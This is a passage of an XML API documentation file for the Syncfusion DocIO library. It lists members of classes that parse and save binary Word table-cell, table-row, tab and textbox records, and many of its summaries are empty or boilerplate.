            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.m_topBorderColorExt">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.#ctor(System.Byte[],System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor"/> class.
            </summary>
            <param name="arr">The arr.</param>
            <param name="iOffset">The i offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse byte array to m_tableStruct
            </summary>
            <param name="arr">The arr.</param>
            <param name="iOffset">The i offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.Save(System.Byte[],System.Int32)">
            <summary>
            Returns array of bytes from m_tableStruct
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.Clone">
            <summary>
            Clones the TableCellDescriptor instance.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.UnderlyingStructure">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.TextFlow">
            <summary>
            Gets or sets the text flow.
            </summary>
            <value>
            The text flow.
            grpfTFlrtb - 0x0000 - Specifies the standard vertical text arrangement. The text block is not rotated. Multiple lines are arranged top to bottom. The characters on a line are laid out left to right.
            grpfTFtbrl - 0x0001 - Specifies a 90-degree clockwise rotation of the standard vertical text block. The lines in the block are vertical and arranged right to left. The characters on a line are rotated 90 degrees in a clockwise direction and laid out top to bottom.
            grpfTFbtlr - 0x0003 - Specifies a 90 degree, counter-clockwise rotation of the standard vertical text block. The lines in the block are vertical and arranged left to right. The characters on a line are rotated 90 degrees in a counter-clockwise direction and laid out bottom to top.
            grpfTFlrtbv - 0x0004 - Specifies the same line layout as grpfTFlrtb, however, each East Asian character is rotated 90 degrees in a counter-clockwise direction. All other text is not rotated.
            grpfTFtbrlv - 0x0005 - Specifies the same rotated line layout as grpfTFtbrl, however, each East Asian character is rotated 90-degrees in a counter-clockwise direction within the block, canceling out the rotation in grpfTFtbrl. All other text is left with the rotation found in grpfTFtbrl.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.TextDirection">
            <summary>
            Gets/sets cell text direction
            </summary>
            <value>
            The text direction.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.HorizontalMerge">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.VerticalMerge">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.VertMerge">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.VertAllign">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.WidthUnit">
            <summary>
            Gets or sets the width unit.
            </summary>
            <value>
            The width unit.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.FitText">
            <summary>
            Get/set table cell fit text property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.TextWrap">
            <summary>
            Gets or sets a table cell text wrap property. The default is <b>true</b>.
            </summary>
            <value>
            <c>true</c> if this instance has text wrap; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.BRCTop">
            <summary>
            Gets or sets the BRC top.
            </summary>
            <value>
            The BRC top.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.BRCLeft">
            <summary>
            Gets or sets the BRC left.
            </summary>
            <value>
            The BRC left.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.BRCBottom">
            <summary>
            Gets or sets the BRC bottom.
            </summary>
            <value>
            The BRC bottom.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.BRCRight">
            <summary>
            Gets or sets the BRC right.
            </summary>
            <value>
            The BRC right.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.TopBorderColorExt">
            <summary>
            Gets or sets the top border color ext.
            </summary>
            <value>
            The top border color ext.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.LeftBorderColorExt">
            <summary>
            Gets or sets the left border color ext.
            </summary>
            <value>
            The left border color ext.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.BottomBorderColorExt">
            <summary>
            Gets or sets the bottom border color ext.
            </summary>
            <value>
            The bottom border color ext.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.RightBorderColorExt">
            <summary>
            Gets or sets the right border color ext.
            </summary>
            <value>
            The right border color ext.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor">
            <summary>
            Summary description for TableRowDescriptor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.#ctor(System.Int32)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
            <param name="memConv"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.Save(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
            <param name="memConv"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.Load(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
            <param name="memConv"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GetLeftIndent(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Gets the left indent.
            </summary>
            <param name="sprms">The SPRMS.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GetCellWidth(System.Int32)">
            <summary>
            
            </summary>
            <param name="cellIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SetCellWidth(System.Int32,System.Int16)">
            <summary>
            
            </summary>
            <param name="cellIndex"></param>
            <param name="width"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.InsertCellDescriptor(System.Int32,Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Inserts the cell descriptor.
            </summary>
            <param name="index">The index.</param>
            <param name="cellFormat">The cell format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.RemoveCellDescriptor(System.Int32)">
            <summary>
            Removes the cell descriptor.
            </summary>
            <param name="index">The index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GetTableCellProperties(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
            <param name="memConv"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GetCellShadings(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GetCellSpacings(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GetTableSpacings(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Gets the table spacings.
            </summary>
            <param name="sprms">The SPRMS.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GetCellBordersColors(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GetColors(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray,System.Int32,System.UInt32[]@)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
            <param name="sprmOptions"></param>
            <param name="colors"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SetTableCellProperties(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
            <param name="memConv"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SetTableOrigin(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Sets the table origin.
            </summary>
            <param name="sprms">The SPRMS.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SetCellShadings(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.ContainsTextureNilStyle(System.Int32,System.Int32)">
            <summary>
            
            </summary>        
            <param name="startAt"></param>
            <param name="count"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SetShadingSprm(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray,System.Int32,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
            <param name="options"></param>
            <param name="startAt"></param>
            <param name="count"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SetCellSpacings(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SetTableSpacings(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SetLeftIndent(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Sets the left indent.
            </summary>
            <param name="sprms">The SPRMS.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.UpdateCenterArray(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Updates the initial value of center array.
            </summary>
            <param name="sprms">The SPRMS.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SetCellBordersColors(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SetColors(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray,System.Int32,System.UInt32[])">
            <summary>
            
            </summary>
            <param name="sprms"></param>
            <param name="sprmOptions"></param>
            <param name="colors"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.CheckValidBorders(System.Int32)">
            <summary>
            
            </summary>
            <param name="i"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GetTextWrapAround">
            <summary>
            Gets the text wrap around.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SetTablePosition(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Sets the table positioning.
            </summary>
            <param name="sprms">The SPRMS.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GetTablePosition(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Gets the table position.
            </summary>
            <param name="sprms">The SPRMS.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.ParseTablePositionCode(System.Byte)">
            <summary>
            Parses the table position code.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.Item(System.Int32)">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.TableShading">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.CellShadings">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.CellCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.LeftIndent">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.CellSpacings">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.TableSpacings">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.IsTableHeader">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.SpacingBetweenCells">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.IsAutoResized">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.Hidden">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.RowHeight">
            <summary>
            when greater than 0. guarantees that the height of the table will be at least 
            dyaRowHeight high. When less than 0, guarantees that the height of the table will be 
            exactly absolute value of dyaRowHeight high. When 0, table will be given a height large 
            enough to represent all of the text in all of the cells of the table. Cells with vertical 
            text flow make no contribution to the computation of the height of rows with auto or at 
            least height. Neither do vertically merged cells, except in the last row of the vertical 
            merge. If an auto height row consists entirely of cells which have vertical text direction 
            or are vertically merged, and the row does not contain the last cell in any vertical cell 
            merge, then the row is given height equal to that of the end of cell mark in the first cell.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.Bidi">
            <summary>
            Gets / sets whether table is right-to-left.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.FitCellText">
            <summary>
            Gets/sets fit cell text property.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.TableWidth">
            <summary>
            Gets or sets the width of the table.
            </summary>
            <value>The width of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GridBeforeWidth">
            <summary>
            Gets or sets the width of the grid before.
            </summary>
            <value>
            The width of the grid before.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.GridAfterWidth">
            <summary>
            Gets or sets the width of the grid after.
            </summary>
            <value>
            The width of the grid after.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.WidthType">
            <summary>
            Gets/Sets Preferred width type
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.WrapTextAround">
            <summary>
            Gets or sets a value indicating whether [wrapping text around].
            </summary>
            <value><c>true</c> if [wrap text around]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.HorizPosition">
            <summary>
            Gets or sets the horizontal position for table.
            </summary>
            <value>The vertical position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.VertPosition">
            <summary>
            Gets or sets the vertical position for table.
            </summary>
            <value>The vertical position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.HorizRelationTo">
            <summary>
            Gets or sets the horizontal relation of the table.
            </summary>
            <value>The horiz relation to.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.VertRelationTo">
            <summary>
            Gets or sets the horizontal relation of the table.
            </summary>
            <value>The horiz relation to.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.DistanceFromTop">
            <summary>
            Gets or sets the distance from top.
            </summary>
            <value>The distance from top.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.DistanceFromBottom">
            <summary>
            Gets or sets the distance from bottom.
            </summary>
            <value>The distance from bottom.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.DistanceFromLeft">
            <summary>
            Gets or sets the distance from left.
            </summary>
            <value>The distance from left.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.DistanceFromRight">
            <summary>
            Gets or sets the distance from right.
            </summary>
            <value>The distance from right.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor.AllowOverlap">
            <summary>
            Gets or sets a value indicating whether allow table to overlap.
            </summary>
            <value><c>true</c> if allow table to overlap; otherwise, <c>false</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo">
            <summary>
            Summary description for TabsDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.m_tabPositions">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.m_tabDeletePositions">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.m_tabDescriptors">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.m_tabsCount">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.m_data">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.m_opcode">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.m_deleteOffset">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.#ctor(System.Byte)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray,System.Int32)">
            <summary>
            
            </summary>
            <param name="sprms"></param>
            <param name="sprm"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.Save(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray,System.Int32)">
            <summary>
            Saves the specified SPRMS.
            </summary>
            <param name="sprms">The SPRMS.</param>
            <param name="sprmOption">The SPRM option.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.Parse(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.ParseInit">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.ParseDeletePositions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.ParsePositions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.ParseDescriptors">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.SaveInit">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.SaveDeletePositions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.SavePositions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.SaveDescriptors">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.TabCount">
            <summary>
            Gets or sets the tab count.
            </summary>
            <value>The tab count.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.TabPositions">
            <summary>
            Gets or sets the tab positions.
            </summary>
            <value>The tab positions.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.TabDeletePositions">
            <summary>
            Gets or sets the tab delete positions.
            </summary>
            <value>The tab delete positions.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabsInfo.Descriptors">
            <summary>
            Gets or sets the descriptors.
            </summary>
            <value>The descriptors.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor">
            <summary>
            Summary description for TextBoxDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.m_cTxbxAndiNextReuse">
            <summary>
            when not fReusable count of textboxes in story chain.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.m_cReusable">
            <summary>
            if fReusable, counts the number of reusable textboxes follow 
            this one in the linked list.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.m_fReusable">
            <summary>
            this textbox is not currently in use.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.m_reserved">
            <summary>
            Reserved
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.m_lid">
            <summary>
            Shape Identifier for first Office Shape in textbox chain.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.m_txidUndo">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.TextBoxCnt">
            <summary>
            Count of textboxes in story chain
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.ReusableCnt">
            <summary>
            The number of reusable 
            textboxes follow this one
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.IsReusable">
             <summary>
            Is current textbox reusable 
             </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor.ShapeIdent">
            <summary>
            Shape Identifier for first Office Shape
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.UniversalPropertyException">
            <summary>
            Summary description for UniversalPropertyException.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.UniversalPropertyException.m_arrData">
            <summary>
            Internal data.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.UniversalPropertyException.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.UniversalPropertyException.#ctor(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="iCount">Number of bytes for the new record.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.UniversalPropertyException.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.UniversalPropertyException.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.UniversalPropertyException.Data">
            <summary>
            Returns internal data array. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.UniversalPropertyException.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmType">
            <summary>
            The properties types
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmType.ParagraphProperties">
            <summary>
            Paragraph properties = 1,
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmType.CharacterProperties">
            <summary>
            Character Properties = 2,
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmType.PictureProperties">
            <summary>
            Picture Properties = 3,
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmType.SectionProperties">
            <summary>
            Section Properties = 4,
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmType.TableProperties">
            <summary>
            Table Properties = 5,
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOperandSize">
            <summary>
            Size of the operand for sprm (Single PRoperty Modifier).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOperandSize.OneBit">
            <summary>
            1 byte, operand affects 1 bit.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOperandSize.OneByte">
            <summary>
            Size of the operand, 1 byte.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOperandSize.TwoBytes">
            <summary>
             Size of the operand, 2 bytes
            </summary>
        </member>
